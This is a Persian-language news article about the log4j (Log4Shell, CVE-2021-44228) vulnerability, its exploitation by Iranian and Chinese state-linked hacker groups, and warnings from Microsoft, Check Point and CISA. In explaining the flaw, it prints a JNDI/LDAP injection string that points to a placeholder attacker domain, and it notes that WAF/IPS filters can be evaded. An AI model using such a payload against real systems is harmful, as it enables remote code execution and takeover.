احمد باطبی
نقص امنیتی موسوم به «لاگ۴جی» (log4j)، یکی از حادترین آسیبپذیریهای تاریخ فضای مجازی است که میلیونها دستگاه متصل به اینترنت را به خطر انداخته و در این میان، هکرهای وابسته به جمهوری اسلامی و هکرهای مرتبط با دولت چین، بیشترین بهره را از آن میبرند.
***
شرکت مایکروسافت، در گزارشهای خود از گروه هکری موسوم به «فوسفورس» (PHOSPHORUS) به عنوان یکی از گروههای هکری پیشتاز در سوءاستفاده از آسیبپذیری لاگ۴جی نام برده و گفته است که این گروه، آسیبپذیری (log4j) را در راستای اهداف خود خصوصیسازی کرده و به اعتقاد متخصصان مایکروسافت، از آن برای اهداف مختلفی، از جمله استقرار باجافزار در دستگاههای آسیبپذیر استفاده میکند.
مرکز اطلاعات تهدیدات مایکروسافت (MSTIC) پیشتر نیز از فوسفورس نام برده و گفته بود که دستکم از سال ۲۰۱۳ مشغول رصد فعالیتهای این گروه تحت فرمان جمهوری اسلامی است. به گفته این مرکز، گروه فوسفورس، یکی از زیرمجموعههای «تهدید پیشرفته مدام » (APT) تحت فرمان رژیم حاکم بر ایران است که جرایم متعددی، از جمله حمله سایبری به مقامات دولت آمریکا، تلاش برای دخالت و اخلال در روند معمول انتخابات ایالات متحده و راهاندازی کمپینهای جاسوسی در شبکههای اجتماعی علیه شهروندان، کارکنان شرکتها و فعالان و روزنامهنگاران را در کارنامه خود دارد.
در روزهای اخیر، شرکت امنیت سایبری آمریکایی-اسراییلی «چکپوینت» (CheckPoint) نیز از ناکامی هکرهای ایرانی در حمله به اهداف متعددی در اسراییل خبرداده بود. به گفته چکپوینت، هکرهای گروه «بچه گربه ملوس» (Charming Kitten)، از زیرمجموعههای «تهدید پیشرفته مدام ۳۵» (APT 35) تلاش کردهاند که با استفاده از ضعف امنیتی (log4j)، به شبکه داخلی هفت سازمان تجاری و دولتی در اسراییل نفوذ کنند. اما این تلاش با دخالت شرکت چکپوینت با شکست مواجه شد.
چکپوینت همچنین در گزارش دیگری از تلاش هکرها برای نصب بدافزار استخراج رمزارز با استفاده از آسیبپذیری (log4j) خبر داده و گفته بود که کارشناسان این شرکت در خلال رصد این ضعف امنیتی بدافزاری به نام «Win32 sfrnp» را کشف کردند که کارش «کریپتو ماینینگ» crypto mining یا به بردگی گرفتن سیستمعاملهای ویندوز و استفاده از توان آنها برای استخراج رمزارز است.
به گفته مایکروسافت، علاوه بر گروه ایرانی فوسفورس، یک گروه هکری چینی بنام «هافنیوم» (HAFNIUM) که در خارج از خاک چین فعالیت میکنند نیز از آسیبپذیری (log4j) برای توسعه فعالیتهای خود بهره میبرد.
به گفته بنیاد نرمافزار «آپاچی» (Apache)، آسیبپذیری لاگ۴جی ابتدا چهارشنبه سوم آذرماه ۱۴۰۰ توسط شرکت «علیبابا»، یکی از غولهای فناوری چینی گزارش شد. اما ثبت رسمی و اعلام عمومی آن با شناسه «CVE-2021-44228» دو هفته بعد، در تاریخ پنجشنبه، ۱۸ آذرماه انجام شد.
این آسیبپذیری در واقع یک ضعف امنیتی در نرمافزار «لاگ۴جی» (log4j) است که به سادگی امکان نفوذ و دراختیار گرفتن سیستمهای کنترل صنعتی، سرورهای میزبان وبسایتها، دستگاههای الکترونیک و مصرفی را برای مجرمان اینترنتی فراهم میکند.
«سرجیو کالتاگیرونه»، معاون شرکت «دراگوس» (Dragos) از جمله ابرشرکتهای امنیت سایبری در جهان، با اشاره به عمق و وسعت خطرهایی که این آسیبپذیری برای صنایع حیاتی، از جمله برق، آب، غذا و نوشیدنی، تولید و حملونقل ایجاد میکند، میگوید: «من فکر میکنم که هیچ یک از فروشندههای بزرگ نرمافزار در جهان را نخواهیم دید، حداقل در بخش صنعتی که با این مشکل آسیبپذیری (log4j) روبرو نشده باشند.»
«جن ایسترلی»، یکی از مقامات دفاعی امنیت سایبری ایالات متحده نیز روز دوشنبه ۲۹ آذرماه در تماسی با مقامات ایالتی و محلی و شرکای بخش خصوصی در آمریکا، نسبت به ابعداد گسترده آسیبپذیری «CVE-2021-44228» هشدار داده و گفته است که این نقص «یکی از جدیترین نقصهایی است که در تمام دوران حرفهای خود دیدهام، اگر نگوییم جدیترین.»
«اریک گلدشتاین»، رییس بخش امنیت سایبری آژانس امنیت سایبری و امنیت زیرساختهای ایالات متحده (CISA) در توصیف شرایط کنونی میگوید: «آنچه که ما با آن روبهرو هستیم، یک آسیبپذیری گسترده و سهلالوصول است که به صورت بالقوه، زمینه آسیب دیدن از سوی دشمنان را فراهم میکند. اما اصلاح و ترمیم این آسیبپذیری قدری طول میکشد.
نرمافزار لاگ۴جی (log4j) کتابخانههای «لاگ جاوا» مشهوری است که به دلیل تواناییهای فراوان آن، بسیار محبوب و پرکاربرد است. این کتابخانه تاکنون بیش از ۴۰۰ هزار بار از مخزن «گیتهاب» (GitHub) دانلود شده و گمان میرود در پیکربندی دستکم ۱۳میلیارد دستگاه در سراسر جهان استفاده شده باشد. تاجایی که با اطمینان میتوان گفت، امروزه هر سرویس شناختهشدهای، از توییتر گرفته تا آمازون و مایکروسافت کاربر این کتابخانه بوده و در نتیجه، در معرض خطر حمله (Remote Code Execution) یا اجرای کدهای مخرب از راه دور هستند.
آسیبپذیری (log4j) با شناسه «CVE-2021-44228» در بسته «لاگ آپاچی۲» (Log4j 2)، نسخه «2.14.1» و نسخ قدیمیتر وجود دارد که مهاجمان از آن برای اجرای کدهای مخرب را از راه دور (Remote Code Execution) بر روی دستگاههای آسیبپذیر و در اختیار گرفتن کنترل آن استفاده میکنند.
برنامههای مبتنی بر جاوا برای فراخوان عناصر جاوا از یک ویژگی به نام «JNDI» و نیز پروتکل متن بازی به نام «DAP» استفاده میکنند. هکرها ابتدا با موتورهای جستوجوگر و یا ابزارهای پیمایش مخصوص این نوع آسیبپذیریها، دستگاههای که از بسته «لاگ آپاچی۲» (Log4j 2)، نسخه «2.14.1» و نسخ قدیمیتر استفاده میکنند را شناسایی کرده و از طریق یکی از این برنامههای مرتبط با ماژول آسیبپذیر، رشتهای مانند «${ jndi:ldap://[attacker_domain]/file}» را تحت عنوان بخشی از نام کاربری، رمز عبور، شماره تلفن و غیره به آن ارسال میکنند. برنامه به شکل خودکار از ویژگی JNDI استفاده کرده و کلاس «[attacker_domain]/file» را با استفاده از پروتکل DAP به مهاجم باز میگرداند. و به این شکل، زمینه برای اجرای کدهای مخرب از راه دور، با استفاده از «Log4Shell» فراهم میشود.
جاوا نسخه ۸ و بالاتر محدودیتهایی را برای رشتههایی مانند «${jndi:ldap://...}» ایجاد کرده است اما این محدودیتها توان ایستادگی در مقابل حملههای پیچیده را ندارند. چرا که این نرمافزار به زبان «اسکریپت» log4j2’s homebrew، موسوم به (lookups) نوشته شده است که در صورت قدری خلاقیت، میتوان آن را برای دور زدن «IPS» و «WAF» توسعه داد. از سویی دیگر، ساختار این مجموعه کدها به شکلی است که نمیتوان حتی در صورت انتشار وصلهامنیتی، تمام مجموعه را وادار کرد که از ماژول وصله شده استفاده کنند.
مشکل بزرگتر این است حتی در صورت انتشار وصله امنیتی و ترمیم آسیبپذیری، درک اینکه دستگاه و یا شبکهها آلوده بوده و یا پاک هستند، امری زمانبر، پیچیده و پرخرج است. و این امکان وجود دارد که هکرهای سازمانیافته، در زنجیرهای از حملات خود به سازمانها و شرکتها، به شبکه داخلی آنها نفوذ کرده و با ایجاد «درب پشتی» (Backdoor) دور از چشم مدیران شبکه حضور خود را تثبیت کرده و بعدها اقدام به حمله و یا سوءاستفاده از اهداف هک شده کنند. از این رو، حتی در صورت عدم شناسایی عملیات نفوذ و یا هک یک شبکه، معاینه فنی و اطمینان از پاکی شبکه امری ضروری است. با توجه به مقیاس جهانی این آسیبپذیری میتوان حدس زد که تنها معاینه فنی شبکه جهت اطمینان از عدم وجود مشکل احتمالی چه هزینه کلانی را بر دوش سازمانها و کسب و کارها خواهد گذاشت.
آژانس امنیت سایبری و امنیت زیرساختهای ایالات متحده (CISA) روز سه شنبه، ۳۰ آذر صفحهای مخصوص برای پرداختن به آسیبپذیری (Apache Log4j) و «CVE-2021-44228» ایجاد کرده و دستورالعملهای لازمالاجرایی را تحت عنوان (BOD) 22-01 و (ED) 22-02 برای کاهش آسیبهای ناشی از این آسیبپذیری عالمگیر ارائه کرده است.
علاوه براین، شرکتهای بزرگ سایبری نیز پیشنهادها و راهکارهای مختلفی را برای جلوگیری از خطرات احتمالی ارائه کردهاند.
مطالب مرتبط:
شکست هکرهای ایرانی برای هک اهداف اسرائیلی
سپاه، چین و روسیه نقشهای اصلی گزارش مرکز امنیت سایبری کانادا
سرقتهای میلیونی از شهروندان ایرانی با ارسال پیامک چهطور صورت گرفت؟
از بخش پاسخگویی دیدن کنید
در این بخش ایران وایر میتوانید با مسوولان تماس بگیرید و کارزار خود را برای مشکلات مختلف راهاندازی کنید
ثبت نظر